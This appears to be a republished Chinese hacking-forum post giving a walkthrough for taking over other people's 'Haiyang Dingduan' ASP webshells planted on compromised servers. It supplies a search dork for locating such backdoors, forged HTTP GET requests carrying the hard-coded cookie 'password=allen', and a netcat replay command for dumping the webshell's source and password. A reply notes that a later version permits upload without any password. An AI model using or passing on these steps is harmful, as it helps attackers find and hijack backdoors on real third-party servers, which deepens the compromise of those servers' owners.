海阳顶端网php,海阳顶端网的ASP木马的一个漏洞和利用
希望LCX別看到這篇文章,呵呵
最近海洋不知道怎么回事,不能上了,我就發在這里了。
我粗粗的看了一下代碼,發現了一個問題,可以得到木馬的密碼,變成自己的木馬。
思路是通過提交的COOKIE來查看木馬的原代碼,找出密碼
看下面的代碼
if?trim(request.form("password"))="haiyangtop.126.com"?then
response.cookies("password")="allen"?密碼是否正確
response.redirect?""&url&""
else?if?Request.Cookies("password")<>"allen"?then
call?login()?密碼錯誤
response.end?停止運行
注意:response.cookies("password")="allen"
他沒有要求SESSION認證,僅僅要求COOKIES里的PASSWORD的值是allen。這就是說我門可以通過COOKIES欺騙來達到進入木馬的目的,然后找到其密碼。
還是實戰一次:
1?找到一個后門,呵呵,不是我的,
在google里查找"一次只能執行一個操作:)在本頁操作"?這是XP。NET版的標志文字,你也可以換成別的,注意一定要加引號,表示不拆分字符串查詢。
這樣就找到了許多,呵呵,我選了一個,路徑是http://ip/images/globla.asp
2?在自己的計算機得到完好的COOKIE信息
我自己的木馬是http://ip/pic/xp.asp
用到一個工具winsock?expert
登陸到自己的ASP木馬,然后找到自己木馬的路徑,停!打開winsock?expert選擇監視對應的IE,然后回到IE點編輯,此時,IE顯示出你的木馬的原代碼了,轉到winsock?expert?在前幾行有一個用get?方法給你的木馬的數據,我的是
GET?/pic/globla.asp?id=edit&path=/pic/xp.asp&attrib=?HTTP/1.1
Accept:?*/*
Referer:?http://202.202.202.202/pic/xp.asp?path=/pic&oldpath=&attrib=
Accept-Language:?zh-cn
Accept-Encoding:?gzip,?deflate
User-Agent:?Mozilla/4.0?(compatible;?MSIE?6.0;?Windows?98)
Host:?202.202.202.202
Connection:?Keep-Alive
Cookie:?ASPSESSIONIDQQQQGIOU=LKBFFJEANEJIGNMKDJEIKNNI;?password=allen
看到password=allen了么?這是ASP木馬認證你是否登陸了方法。現在很簡單了
把??數?據中所有的?ip?和路徑改為別人的木馬路徑。還要將
GET?/pic/globla.asp?id=edit&path=/pic/xp.asp&attrib=?HTTP/1.1
中的PATH=后的值改為別人的木馬路徑。
我找的木馬是http://ip/images/globla.asp
所以我改后的數據是
GET?/images/globla.asp?id=edit&path=/images/globla.asp&attrib=?HTTP/1.1
Accept:?*/*
Referer:?http://202.202.202.202/images/globla.asp?path=/images&oldpath=&attrib=
Accept-Language:?zh-cn
Accept-Encoding:?gzip,?deflate
User-Agent:?Mozilla/4.0?(compatible;?MSIE?6.0;?Windows?98)
Host:?202.202.202.202
Connection:?Keep-Alive
Cookie:?ASPSESSIONIDQQQQGIOU=LKBFFJEANEJIGNMKDJEIKNNI;?password=allen
好了,保存在文本。
3?提交我們的數據
進入命令行,進入NC的目錄,鍵入命令
nc?-vv?202.202.202.202?80?>1.txt
>1.txt?表示將返回的信息保存在同目錄的1.txt
一定要在CMD下鍵入命令,直接打開NC無法保存數據
呆會會提示連接成功,然后我門將作好的COOKIE粘貼在里面,然后按兩次回車。
實際這時我門就通過了他的?驗證并請求木馬的原代碼。
然后在同目錄下1.txt就看到了木馬的原代碼,
修改下面的haiyangtop.126.com改為你密碼
if?trim(request.form("password"))="23kodf@"?then
哈哈,看到密碼了,然后登陸吧,再改了密碼,這個木馬就是你的了。
俗話說了,黑窩更應該加強安全警戒,海洋頂端木馬應用的范圍很廣,希望作者能盡快改進,添加session認證,使其更安全!
lcx:寫的海陽頂端網的總是寫得非常好呀。這個漏洞我很早就知道了,但利用方法沒想到你做得這么巧妙!!精彩。2003版漏洞更大,上傳根本不需要密碼。
其實,原來寫的時候,只是將別人的一些代碼組織在一塊兒,根本沒有考慮密碼的問題,只是做為一個后門。用了個密碼,只是區分fso和非fso。
還要說明一點的是,我和allen不會對這個木馬再做任何改動了。
整天將別人的源碼組合來組合去,還要回答無窮無盡的關于菜鳥對這個asp木馬的使用方法,誰還改呀~
總結
以上是生活随笔為你收集整理的海阳顶端网php,海阳顶端网的ASP木马的一个漏洞和利用的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 程序员的算法趣题Q68: 异性相邻的座位
- 下一篇: 三星 android 模拟器,三星Gal